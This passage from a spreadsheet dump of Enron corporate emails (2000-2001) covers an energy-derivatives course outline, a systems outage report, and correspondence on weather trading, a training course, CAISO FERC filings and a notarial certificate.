and natural gas_x000D_
2.  Understanding the structuring, reverse engineering and valuation of_x000D_
exchange-traded and OTC energy derivatives, including "exotic" options,_x000D_
structured products, and spread and basis products_x000D_
3.  Promoting a common language between trading and marketing personnel_x000D_
regarding valuation and hedging of structured products_x000D_
4.  Risk-management_x000D_
_x000D_
Program Contents:_x000D_
I.  "Electricity 101"_x000D_
-- Problems in pricing_x000D_
-- Spot markets_x000D_
-- Forward markets_x000D_
-- Trading:  Basis, fixed-price, volatility_x000D_
-- Markets:  Characteristics and participants_x000D_
_x000D_
II.  Valuation/Structuring/Hedging_x000D_
1.  Fundamentals of Forwards and Futures Contracts:_x000D_
-- Forward Contracts:  Definition, Payoff Diagram, Pricing by Arbitrage_x000D_
-- Futures vs. Forwards_x000D_
-- Commodity Futures_x000D_
-- Swaps_x000D_
-- Constructing Forward Curves:  Contrast with price forecast; Using the_x000D_
spark spread; Incorporating regional bases_x000D_
_x000D_
2.  Introduction to Option Pricing:_x000D_
-- Payoffs_x000D_
-- Put-Call Parity_x000D_
-- Binomial Model_x000D_
-- Black-Scholes Formula_x000D_
-- Option "Sensitivities" (the "Greeks"); Delta and Gamma_x000D_
_x000D_
3.  Uniqueness of Energy Derivatives:_x000D_
-- "Term Structure" of Volatility_x000D_
-- Convenience Yield / Seasonality_x000D_
-- Basis_x000D_
_x000D_
4.  Estimating Volatility in Energy Markets:_x000D_
-- Estimating Volatility in Financial Markets_x000D_
-- Hourly vs. Daily Vols_x000D_
-- Historical or Implied Vols?_x000D_
-- Characterizing the Volatility "Surface" Across Time and Strike_x000D_
_x000D_
5.  Design and Valuation of Structured Products in Commodity Markets:_x000D_
-- Valuation of European Call Options in Energy Markets_x000D_
-- Average Options on Oil Futures Contracts_x000D_
-- Spread and Basis Products_x000D_
-- "Swing" Options in Power Markets_x000D_
-- Weather Derivatives_x000D_
_x000D_
6.  Risk-Management_x000D_
-- Motivation for Structured Trades_x000D_
-- Valuation of real options (e.g., valuation of power plant or gas field)_x000D_
-- Value-at-Risk (one- and multi-factor models)_x000D_
-- Repowering option_x000D_
_x000D_
7.  Advanced Topics (for qualified audiences)_x000D_
-- Relationship between forward prices and expected spot prices_x000D_
-- The Importance of Hedging Volatility Changes_x000D_
-- Consistent Method for Estimating Hourly, Daily and Monthly Term_x000D_
Structures of Volatility_x000D_
-- Practical Alternatives to Vega-Hedging_x000D_
-- Applying Options Theory to the Valuation of Power Plants_x000D_
-- Valuation of "Swing" Options under Ruthless and Non-Ruthless Exercise_x000D_
_x000D_
==============================================_x000D_
     Ehud I. Ronn_x000D_
     Professor of Finance and Jack S. Josey Professor in Energy Studies_x000D_
     Director, Center for Energy Finance Education and Research_x000D_
     McCombs School of Business_x000D_
     University of Texas at Austin_x000D_
     Austin, TX. 78712-1179_x000D_
     Voice:  (512) 471-5853_x000D_
      FAX:   (512) 471-5073_x000D_
      Internet:  eronn@mail.utexas.edu_x000D_
=================================================_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 13 May 2001 12:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>eThink About It: 5/14/01</t>
  </si>
  <si>
    <t>Participate in National Fitness Week on eSpeak!  Tuesday, May 15 at 10 a.m. _x000D_
Houston time, join Dr. Joel Bloom, Associate Professor of Health and Human _x000D_
Performance at the University of Houston.  Ask Dr. Bloom about  topics such _x000D_
as the difference between sports drinks and water, myths about abdominal _x000D_
exercise, to breakfast or not to breakfast and much more!_x000D_
Remember:  You don't have to participate in the live event to get your _x000D_
questions answered.  Go to eSpeak now and post your questions for Dr. Bloom.  _x000D_
You can go to the eSpeak archive later and read the transcript to find your _x000D_
answer._x000D_
_x000D_
_x000D_
Check out the new postings in the Office of the Chairman category in eMeet.  _x000D_
While you're there, add some thoughts of your own to any of the ongoing _x000D_
discussions.  Visit eMeet today!_x000D_
_x000D_
_x000D_
Do you know what hollow core fiber is?  Would you like to know?  Stop by the _x000D_
Idea Vault at the ThinkBank and find out!  Haven't been there in a while?  _x000D_
You have some catching up to do, then!_x000D_
_x000D_
ethink.enron.com</t>
  </si>
  <si>
    <t>Fri, 14 Jul 2000 08:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robert.lloyd@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'lee.papayoti@enron.com', 'gary.lamphier@enron.com', 'gary.hanks@enron.com', 'rita.wynne@enron.com', 'daren.farmer@enron.com'})</t>
  </si>
  <si>
    <t>Out of the office during the week of July 17th thru July 21st</t>
  </si>
  <si>
    <t xml:space="preserve">  _x000D_
 I will be out of the office next  week. During my absence, please contact _x000D_
Bob Cotten at extension 3-6101.</t>
  </si>
  <si>
    <t>Fri, 30 Mar 2001 08:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>SUPPLEMENTAL Weekend Outage Report for 3-30-01 through 4-02-01</t>
  </si>
  <si>
    <t>------------------------------------------------------------------------------_x000D_
------------------------_x000D_
W E E K E N D   S Y S T E M S   A V A I L A B I L I T Y_x000D_
_x000D_
F O R_x000D_
_x000D_
March 30, 2001 5:00pm through April 2,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SEE ORIGINAL REPORT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ALSO SEE ORIGINAL REPORT_x000D_
Impact:  CORP_x000D_
Time:  Fri 3/30/2001 at  5:00:00 PM CT thru Fri 3/30/2001 at  5:30:00 PM CT_x000D_
 Fri 3/30/2001 at  3:00:00 PM PT thru Fri 3/30/2001 at  3:30:00 PM PT_x000D_
 Sat 3/31/2001 at  12:00:00 AM London thru Sat 3/31/2001 at  12:30:00 AM _x000D_
London_x000D_
Outage:  Emergency Production Website Updates_x000D_
Environments Impacted:  All HR Global Applications, namely eHRonline, GCS, _x000D_
GIS, ExpertFinder, etc._x000D_
Purpose: Global Application websites must be changed to support new _x000D_
initiatives._x000D_
Backout: Restore old website files_x000D_
Contact(s):  Brandon Bangerter    _x000D_
  Brian Ellis  713-345-8017  713-446-6193_x000D_
  Raj Perubhatla  713-345-8016  281-788-9307 _x000D_
  _x000D_
Impact:  CORP_x000D_
Time:  Sun 4/1/2001 at  8:00:00 AM CT thru Sun 4/1/2001 at  12:00:00 PM CT_x000D_
 Sun 4/1/2001 at  6:00:00 AM PT thru Sun 4/1/2001 at  10:00:00 AM PT_x000D_
 Sun 4/1/2001 at  2:00:00 PM London thru Sun 4/1/2001 at  6:00:00 PM London_x000D_
Outage:  HR WEBi update on Production Servers_x000D_
Environments Impacted:  All Business Objects users as well as users of all HR _x000D_
Global Applications namely eHRonline, GIS, GCS, ExpertFinder, etc._x000D_
Purpose: To take advantage of the features and benefits of the latest version _x000D_
of WEBi._x000D_
Backout: Restore previous version of WEBi._x000D_
Contact(s):  Brandon Bangerter    _x000D_
  Brian Ellis  713-345-8017  713-446-6193_x000D_
  Raj Perubhatla  713-345-8016  281-788-9307 _x000D_
                            _x000D_
SITARA:  No Scheduled Outages._x000D_
_x000D_
SUN/OSS SYSTEM: No Scheduled Outages._x000D_
_x000D_
TELEPHONY:     SEE ORIGINAL REPORT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713) _x000D_
345-4727 _x000D_
Unify On-Call      (713) 284-3757  [Pager]_x000D_
Sitara On-Call     (713) 288-0101  [Pager]_x000D_
RUS/GOPS/GeoTools/APRS   (713) 639-9726  [Pager]_x000D_
OSS/UA4/TARP    (713) 285-3165  [Pager]_x000D_
CPR      (713) 284-4175  [Pager]_x000D_
EDI Support      (713) 327-3893  [Pager]_x000D_
EES Help Desk     (713)853-9797 OR (888)853-9797</t>
  </si>
  <si>
    <t>Tue, 30 May 2000 10:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>EOL Weather Derivatives - Japan (Legal Advice)</t>
  </si>
  <si>
    <t xml:space="preserve">Alan further to our discussion last week. Attached is request for further _x000D_
advice from Baker and McKenzie on trading weather products with Japanese _x000D_
counterparties through EOL. As discussed would you forward it to B &amp; M. The _x000D_
date of the previous advice which indicated there are no regulatory issues _x000D_
with weather trading needs to be inserted in 2 places. (Would you be able to _x000D_
send me a copy of this advice.) _x000D_
_x000D_
We need to have all legal issues resolved prior to 23 June.   This is the _x000D_
scheduled date for function the public function to launch of EOL weather _x000D_
trading in Australia .  We plan to trade Tokyo and Osaka   in addition to _x000D_
Australian cities. There was discussion of  Seoul weather products but this _x000D_
has not progressed. If it does then will need to do the required due _x000D_
diligence for Korea. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
      </t>
  </si>
  <si>
    <t>Thu, 10 Aug 2000 08:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mildred.cornelius@gsb.uchicago.edu'})</t>
  </si>
  <si>
    <t>Chicago GSB Executive MBA Program</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Prospective Applicant:_x000D_
_x000D_
Thank you for your interest in our Chicago GSB MBA Executive Program.  A_x000D_
packet containing an application and brochure will be sent within the next_x000D_
two weeks._x000D_
_x000D_
We look forward to the opportunity to serve you as you pursue an M.B.A._x000D_
degree._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Mildred D. Cornelius_x000D_
Admissions Coordinator_x000D_
Chicago GSB, Part-Time M.B.A. Programs_x000D_
Gleacher Center_x000D_
450 N. Cityfront Plaza Dr._x000D_
Chicago, IL  60611_x000D_
email:  mildred.cornelius@gsb.uchicago.edu_x000D_
Telephone:  312/464-8700_x000D_
FAX:  312/464-8778_x000D_
</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 14:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'willwestern@email.msn.com'})</t>
  </si>
  <si>
    <t>Re: Customer info</t>
  </si>
  <si>
    <t xml:space="preserve">A change in the Higgins Brick contact- Ron the owner will be out have J._x000D_
call Lori at 3107722813_x000D_
----- Original Message -----_x000D_
From: &lt;Kim.Ward@enron.com&gt;_x000D_
To: &lt;willwestern@email.msn.com&gt;_x000D_
Sent: Monday, April 09, 2001 8:45 AM_x000D_
Subject: Re: Customer info_x000D_
_x000D_
_x000D_
&gt;_x000D_
&gt; Willis,_x000D_
&gt;_x000D_
&gt; I just got off of the phone with my credit guy - He says that most of the_x000D_
&gt; people on this list are not public companies.  It would be very helpful_x000D_
and_x000D_
&gt; will expedite the process if you could get the latest audited financial_x000D_
&gt; statements, with notes, from each of these companies.  With the PG&amp;E_x000D_
thing,_x000D_
&gt; credit is swamped, but, if I had the info in hand, I could push our cause._x000D_
&gt;_x000D_
&gt; Thanks,_x000D_
&gt;_x000D_
&gt; Kim_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; "Willis C. Bennett" &lt;willwestern@email.msn.com&gt; on 04/06/2001 02:05:05 PM_x000D_
&gt;_x000D_
&gt; To:   &lt;kim.ward@enron.com&gt;_x000D_
&gt; cc:_x000D_
&gt; Subject:  Customer info_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Hope this helps_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; (See attached file: enron1.xls)_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
</t>
  </si>
  <si>
    <t>Tue, 31 Oct 2000 19:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>EBR, 6 November</t>
  </si>
  <si>
    <t>Steve - After last week's "win" on the European export charge (you have _x000D_
received a few e-mails from me on this), I think we might want to change the _x000D_
one slide that touches upon this issue before the EBR.  I do not have the _x000D_
relevant slide here with me in Tokyo, but could work with Elizabeth on _x000D_
Friday, changing my earlier materials.  In the prior materials, we showed _x000D_
this a big "defensive" issue (risk to be mitigated).  I (very) conservatively _x000D_
put the value to Enron at $5MM for 2001 (Joe Gold says it saves him several _x000D_
hundred thousand this Q4 alone, and that number is low because he realigned _x000D_
his supply portfolio in anticipation of the charge being effective Oct. 1, _x000D_
which realignment he says he has not done/did not do yet for 2001, hence the _x000D_
bigger figure.  Any way, if you want to make the change, if Elizabeth will _x000D_
call me Friday, we can work to incorporate it.   thanks  mcs</t>
  </si>
  <si>
    <t>Tue, 29 Feb 2000 03:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: NSM documents</t>
  </si>
  <si>
    <t>Thanks for the update.</t>
  </si>
  <si>
    <t>Mon, 19 Feb 2001 11:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: weather course</t>
  </si>
  <si>
    <t xml:space="preserve">Joe,_x000D_
_x000D_
This is the most recent offer from Lacima_x000D_
(weather derivatives course). What do you think?_x000D_
_x000D_
_x000D_
Vince_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 02/19/2001 _x000D_
07:15 PM ---------------------------_x000D_
_x000D_
_x000D_
"Julie" &lt;julie@lacimagroup.com&gt; on 02/19/2001 03:19:45 PM_x000D_
Please respond to "Julie" &lt;julie@lacimagroup.com&gt;_x000D_
To: "VinceJKaminski" &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Re: weather course_x000D_
_x000D_
_x000D_
_x000D_
Vince,_x000D_
Enron is fine (although I think we have to pay for the Hyatt anyway)._x000D_
?_x000D_
Good discount (I have a feeling that my idea of a good discount and the  _x000D_
weather desk's idea is probably different?):? for the one day, $1100 per  _x000D_
person.? If you think that there will be?around 10 people or more,  then we _x000D_
can offer a day rate, regardless of the number of people.? _x000D_
?_x000D_
Thanks Vince_x000D_
?_x000D_
Julie_x000D_
?_x000D_
PS - Of course when I announced that we were cancelling, people started  _x000D_
responding that they wished to attend.? Ugh!_x000D_
?_x000D_
----- Original Message ----- _x000D_
From:  Vince.J.Kaminski@enron.com _x000D_
To: Julie  _x000D_
Cc: Vince.J.Kaminski@enron.com _x000D_
Sent: Friday, February 16, 2001 4:05  PM_x000D_
Subject: Re: weather course_x000D_
_x000D_
_x000D_
Julie,_x000D_
_x000D_
Enron location makes more sense. No reason to  pay for the hotel._x000D_
Also, I think that one day makes more sense._x000D_
_x000D_
I  contacted the weather desk about including other people at the  training_x000D_
course. I think that they would be interested if they got a good  discount._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Julie" &lt;julie@lacimagroup.com&gt; on  02/16/2001 09:39:37 AM_x000D_
_x000D_
Please respond to "Julie" &lt;julie@lacimagroup.com&gt;_x000D_
_x000D_
To:??  &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
cc:_x000D_
Subject:?  Re: weather course_x000D_
_x000D_
_x000D_
_x000D_
Vince,_x000D_
_x000D_
Great. Just to let you know,  we decided not to wait on the indecisive_x000D_
ones, and postponed the open  course. It's yours, whatever you want: ? 1_x000D_
day (specific to what you  feel will be of the most benefit), 2 days, Hyatt_x000D_
or? Enron, or not at  all. I hope this doesn't cause problems for you._x000D_
Special deal, for sure. I  owe my godfather._x000D_
_x000D_
Julie_x000D_
_x000D_
_x000D_
----- Original Message  -----_x000D_
From:? Vince.J.Kaminski@enron.com_x000D_
To:  Julie_x000D_
Cc: Joseph.Hrgovcic@enron.com_x000D_
Sent:  Thursday, February 15, 2001 3:16? PM_x000D_
Subject: Re: weather  course_x000D_
_x000D_
_x000D_
Julie,_x000D_
_x000D_
That's definitely an option._x000D_
_x000D_
We  can? provide the room. Maybe we can cut with you a special deal  for_x000D_
Enron_x000D_
and? increase the # of people attending. I am forwarding  your message to_x000D_
our? weather  desk._x000D_
_x000D_
Vince_x000D_
_x000D_
Joe,_x000D_
_x000D_
What do you think about?  it?_x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Julie" &lt;julie@lacimagroup.com&gt; on?  02/15/2001 08:20:24 AM_x000D_
_x000D_
Please respond to "Julie" &lt;julie@lacimagroup.com&gt;_x000D_
_x000D_
To:  ? "VinceJKaminski" &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
cc:_x000D_
Subject:  ? weather course_x000D_
_x000D_
_x000D_
_x000D_
Vince,_x000D_
_x000D_
We just wanted to let you  know? that we only have 3 people signed up for_x000D_
the_x000D_
weather  derivatives course? (all from Enron) so far. We have a couple  more_x000D_
that have expressed strong? interest, but we are awaiting their  final_x000D_
decision. If no one else signs? up, Chris and Les thought that  you guys_x000D_
could probably get through the? first day pretty easily, and  thus thought_x000D_
it_x000D_
may be an option to teach just? the 2nd day  material (pricing) only at_x000D_
Enron_x000D_
(doing it at the Hyatt is an?  option as well but the room might be on the_x000D_
large side)? We would?  obviously reimburse you for the day not taught. We_x000D_
can teach both days  as? well, but thought you may want to save some time._x000D_
_x000D_
I just  wanted to give? you some time to think about it. We will know where_x000D_
we  stand on final? numbers by next?  Wednesday._x000D_
_x000D_
Julie_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 23 Mar 2001 09:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kmahmoud@austin.rr.com', 'kelly.mahmoud@enron.com'})</t>
  </si>
  <si>
    <t>Misc Ecogas Issues</t>
  </si>
  <si>
    <t>A few issues before you're off!_x000D_
_x000D_
Who's got the Ecogas checkbook, bank records, etc...?  How much do we have in _x000D_
the account?  After you leave, who will have it?_x000D_
What payables do we currently have or are accruing that need to be paid from _x000D_
this account (i.e., Melton &amp; Melton, etc...)_x000D_
Who is/will be acting as point for the Melton &amp; Melton work?_x000D_
Have you made any plans to have the mail forwarded to Houston?  _x000D_
Is there still an answering machine/service active?  If so, should probably _x000D_
either change it to reflect a new number here (get Legal's approval first) or _x000D_
just deactivate it altogether.  Suggest Legal make that decision._x000D_
Are there any other "housekeeping" items that need to be covered before you _x000D_
leave?_x000D_
_x000D_
I would suggest all of this be centrally coordinated by someone in Legal _x000D_
(Lisa Mellencamp, Dan Lyons or Richard Sanders), Dick Lydecker's group, _x000D_
Herman Manis' group or maybe Donna Lowry in the compliance group._x000D_
_x000D_
I'll be out all next week in London, at a conference and customer meetings.  _x000D_
Will be checking v-mail regularly.  Beth can reach me if needed.  Otherwise _x000D_
I'll be back in the office on 4/2._x000D_
_x000D_
RANDY</t>
  </si>
  <si>
    <t>Mon, 31 Jan 2000 07:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'billyh@ueplaza.com'})</t>
  </si>
  <si>
    <t>Agreement with Transwestern</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Mr. Henderson:_x000D_
_x000D_
Attached pursuant to Dave Foti's request is the Substation Maintenance _x000D_
Agreement in Word format with Transwestern's proposed changes shown in _x000D_
redlining.  After you've had a chance to review the agreement, please feel _x000D_
free to contact me with any questions or comments._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Susan Scott_x000D_
Counsel for Transwestern Pipeline Company_x000D_
(713) 853-0596_x000D_
sscott3@enron.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 23 Jun 2000 08:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>DC Meeting Update</t>
  </si>
  <si>
    <t>please note addition of 3:30 meeting_x000D_
1:00 PM Ryan Weston_x000D_
  House Agriculture Committee_x000D_
  1301 Longworth_x000D_
  202-225-2171_x000D_
_x000D_
2:30 PM Shawn Pfaff_x000D_
  Office of Congressman Pomeroy_x000D_
  1533 Longworth House Office Building_x000D_
  202-225-2611_x000D_
_x000D_
3:00 PM David Kay_x000D_
  Office of Congressman Chris John_x000D_
  1504 Longworth House Office Building_x000D_
  202-225-2031_x000D_
_x000D_
3:30 PM John Hixon_x000D_
  Office of Congressman Jerry Moran_x000D_
  1519 Longworth House Office Building_x000D_
  225-2715_x000D_
_x000D_
4:30 PM Geof Gradler_x000D_
  Senate Banking Committee_x000D_
  534 Dirksen Senate Office Building_x000D_
  202-224-7391 _x000D_
_x000D_
5:00 PM Steve Ganis_x000D_
  House Banking Committee_x000D_
  2129 Rayburn House Office Building_x000D_
  202-225-7502</t>
  </si>
  <si>
    <t>Wed, 11 Jul 2001 15:35:34 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'donna.sheidun@enron.com'})</t>
  </si>
  <si>
    <t>RE: More questions - FW: ISO Compliance Filing on June 19 FERC Or_x000D_
	der</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for sending your input on price transparency.  I will forward this_x000D_
issue to the group who worked on this filing.  Send any other_x000D_
questions/concerns you may have.  Also, keep in mind that there is a_x000D_
conference call next week.  See attached._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Keoni Almeida_x000D_
California Independent System Operator_x000D_
phone: 916/608-7053_x000D_
pager:  916/814-7352_x000D_
alpha page:  9169812000.1151268@pagenet.net_x000D_
e-mail:  &lt;mailto:kalmeida@caiso.com&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Sheidun, Donna [mailto:donna.sheidun@ENRON.com]_x000D_
Sent: Wednesday, July 11, 2001 3:21 PM_x000D_
To: kalmeida@caiso.com_x000D_
Subject: More questions - FW: ISO Compliance Filing on June 19 FERC_x000D_
Order_x000D_
Importance: High_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Message-ID: &lt;132A7F5BA87AD311AB8200508B7306E10380B949@csifiapp667.wepex.net&gt;_x000D_
From: "Woertz, Byron" &lt;BWoertz@caiso.com&gt;_x000D_
Sender: "Grant, Colleen" &lt;CGrant@caiso.com&gt;_x000D_
Reply-To: "Woertz, Byron" &lt;BWoertz@caiso.com&gt;_x000D_
To: ISO Market Participants &lt;IMCEAEX-_O=CAISO_OU=CORPORATE_CN=DISTRIBUTION+20LISTS_CN=ISO+20MARKET+20PARTICIPANTS@caiso.com&gt;_x000D_
Subject: CAISO Notice - ISO Compliance Filing on June 19 FERC Order_x000D_
Date: Wed, 11 Jul 2001 09:45:24 -0700_x000D_
Importance: high_x000D_
X-Priority: 1_x000D_
MIME-Version: 1.0_x000D_
X-Mailer: Internet Mail Service (5.5.2650.21)_x000D_
Content-Type: text/plain;	charset="iso-8859-1"_x000D_
_x000D_
	ISO Market Participants:_x000D_
_x000D_
	As you know, on June 19, the FERC released its "Order On Rehearing_x000D_
Of Monitoring And Mitigation Plan For The California Wholesale Electric_x000D_
Markets, Establishing West-Wide Mitigation, And Establishing Settlement_x000D_
Conference." Since the Order was released, market participants have raised_x000D_
several questions regarding the Order. The ISO has received several_x000D_
questions and plans to share those questions and answers with you within the_x000D_
next few days._x000D_
_x000D_
	In addition, in compliance with the June 19 FERC Order, the ISO has_x000D_
made its compliance filing with FERC. The filing is posted on the ISO web_x000D_
site at http://www1.caiso.com/pubinfo/FERC/filings/ for your review._x000D_
_x000D_
	The ISO will host a conference call from 12:00 p.m. to 2:00 p.m. PDT_x000D_
on Monday, July 16 to discuss questions you may have regarding the FERC's_x000D_
June 19 Order. The details of the call are as follows:_x000D_
_x000D_
	Dial-In Number: (877)381-6005_x000D_
_x000D_
	Conference ID: 1361763_x000D_
_x000D_
	Leader: Byron Woertz_x000D_
_x000D_
	Our goal will be to clarify the ways in which the ISO is_x000D_
interpreting and implementing the FERC Order and to address other_x000D_
implementation issues you may have. We do not plan to discuss issues that_x000D_
are pending or are more appropriately addressed at FERC. If you have_x000D_
specific questions you would like for us to address, please send them to me_x000D_
by COB on Thursday, July 12 so that we can be better prepared to address_x000D_
them during the call on Monday. If you have any questions, please call or_x000D_
e-mail me._x000D_
_x000D_
_x000D_
_x000D_
	Byron B. Woertz, Jr._x000D_
_x000D_
	Director, Client Relations_x000D_
_x000D_
	(916) 608-7066_x000D_
_x000D_
	(800) 481-7037 - Pager_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 04:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kdautenh@lehman.com'})</t>
  </si>
  <si>
    <t>FW: FW: NOTARIAL CERTIFICATE FOR ENRON CORP.</t>
  </si>
  <si>
    <t xml:space="preserve">Sara,_x000D_
_x000D_
Please see the attached correspondence between Stephanie Panus of Enron and_x000D_
myself. I only received the required, original Notary Certificate from_x000D_
Stephanie this past Friday, although it was first requested back in_x000D_
December._x000D_
_x000D_
Now that I have it, I am expediting the process of obtaining the Apostille_x000D_
and sending the Agreement off to our Zurich office for signature. We should_x000D_
have your originals to you by next week sometime._x000D_
_x000D_
Please do not hesitate to call me if you have questions about any of this._x000D_
My number is 646-836-2011._x000D_
_x000D_
Thank you,_x000D_
Kimberly Dautenhahn_x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Dautenhahn, Kimberly_x000D_
&gt; Sent: Thursday, March 29, 2001 12:14 PM_x000D_
&gt; To: 'Stephanie.Panus@enron.com'_x000D_
&gt; Subject: RE: FW: NOTARIAL CERTIFICATE FOR ENRON CORP._x000D_
&gt;_x000D_
&gt; Stephanie,_x000D_
&gt;_x000D_
&gt; I received your voice-mail of earlier this week. I did not receive the_x000D_
&gt; package containing the notary certificate, only the fax. In addition, the_x000D_
&gt; certificate which you sent to me is not in the form which we requested. It_x000D_
&gt; may be sufficient; I will have to check with our service company. However,_x000D_
&gt; I will at least need an original copy of the certificate which you faxed_x000D_
&gt; to me. Please make sure it is sent to my attention at our new address:_x000D_
&gt;_x000D_
&gt; Lehman Brothers_x000D_
&gt; One World Financial Center_x000D_
&gt; 27th Floor_x000D_
&gt; New York, NY 10281_x000D_
&gt;_x000D_
&gt; Thank you,_x000D_
&gt; Kimberly_x000D_
&gt;_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Stephanie.Panus@enron.com [SMTP:Stephanie.Panus@enron.com]_x000D_
&gt; Sent: Wednesday, March 14, 2001 3:25 PM_x000D_
&gt; To: Dautenhahn, Kimberly_x000D_
&gt; Subject: Re: FW: NOTARIAL CERTIFICATE FOR ENRON CORP._x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Kimberly,_x000D_
&gt;_x000D_
&gt; I have tracked down the notarized certificate from our corporate office_x000D_
&gt; and_x000D_
&gt; am faxing a copy to you.  I will also forward the original in overnight_x000D_
&gt; delivery.  Sorry again for the delay on our end._x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; "Dautenhahn, Kimberly" &lt;kdautenh@lehman.com&gt; on 03/13/2001 03:51:41 PM_x000D_
&gt;_x000D_
&gt; To:   "'stephanie.panus@enron.com'" &lt;stephanie.panus@enron.com&gt;_x000D_
&gt; cc:_x000D_
&gt;_x000D_
&gt; Subject:  FW: NOTARIAL CERTIFICATE FOR ENRON CORP._x000D_
&gt;_x000D_
&gt; Stephanie,_x000D_
&gt; Richard Weiss forwarded to me your e-mail from today. The reason we have_x000D_
&gt; not_x000D_
&gt; sent you the executed Master Agreement is because it has not been_x000D_
&gt; executed._x000D_
&gt; Switzerland will not execute the document without an Apostille, and we_x000D_
&gt; cannot obtain an Apostille until you send us the Notarial Certificate as_x000D_
&gt; per_x000D_
&gt; the attached messages. Please advise as to the status of this at your_x000D_
&gt; earliest convenience._x000D_
&gt; Thanks,_x000D_
&gt; Kimberly_x000D_
&gt;_x000D_
&gt; &gt; -----Original Message-----_x000D_
&gt; &gt; From:         Stephanie.Panus@enron.com [SMTP:Stephanie.Panus@enron.com]_x000D_
&gt; &gt; Sent:         Wednesday, January 24, 2001 6:21 PM_x000D_
&gt; &gt; To:           Dautenhahn, Kimberly_x000D_
&gt; &gt; Subject:           Re: NOTARIAL CERTIFICATE FOR ENRON CORP._x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; Kimberly,_x000D_
&gt; &gt;_x000D_
&gt; &gt; Sorry for the delay.  I did receive the package and sent the certificate_x000D_
&gt; &gt; to_x000D_
&gt; &gt; our corporate department for execution since it is for Enron Corp.  I am_x000D_
&gt; &gt; checking with them and will let you know the status._x000D_
&gt; &gt;_x000D_
&gt; &gt; Stephanie Panus_x000D_
&gt; &gt; Sr. Legal Specialist_x000D_
&gt; &gt; Enron North America Corp._x000D_
&gt; &gt; 1400 Smith Street, Suite 3806_x000D_
&gt; &gt; Houston, Texas 77006_x000D_
&gt; &gt; ph:  713.345.3249_x000D_
&gt; &gt; fax:  713.646.3490_x000D_
&gt; &gt; stephanie.panus@enron.com_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; "Dautenhahn, Kimberly" &lt;kdautenh@lehman.COM&gt; on 01/24/2001 02:55:38 PM_x000D_
&gt; &gt;_x000D_
&gt; &gt; To:   "'STEPHANIE.PANUS@ENRON.COM'" &lt;STEPHANIE.PANUS@ENRON.COM&gt;_x000D_
&gt; &gt; cc:_x000D_
&gt; &gt;_x000D_
&gt; &gt; Subject:  NOTARIAL CERTIFICATE FOR ENRON CORP._x000D_
&gt; &gt;_x000D_
&gt; &gt; Stephanie,_x000D_
&gt; &gt;_x000D_
&gt; &gt; On December 27, 2000 I sent you a package containing a Notarial_x000D_
&gt; &gt; Certificate_x000D_
&gt; &gt; which needs to be completed and returned to us. I have yet to receive_x000D_
&gt; &gt; anything or to get any response from you._x000D_
&gt; &gt;_x000D_
&gt; &gt; Please advise if you received this package and when I should be_x000D_
&gt; expecting_x000D_
&gt; &gt; the completed certificate. Until we have it, we cannot obtain the_x000D_
&gt; &gt; Apostille_x000D_
&gt; &gt; which is required in order for any of your documents to be used in_x000D_
&gt; &gt; Switzerland._x000D_
&gt; &gt;_x000D_
&gt; &gt; If you have any questions regarding this, please contact me at your_x000D_
&gt; &gt; earliest_x000D_
&gt; &gt; convenience._x000D_
&gt; &gt;_x000D_
&gt; &gt; Thank you,_x000D_
&gt; &gt; Kimberly_x000D_
&gt; &gt;_x000D_
&gt; &gt; Kimberly A. Dautenhahn_x000D_
&gt; &gt; Transaction Management_x000D_
&gt; &gt; Corporate Advisory Division_x000D_
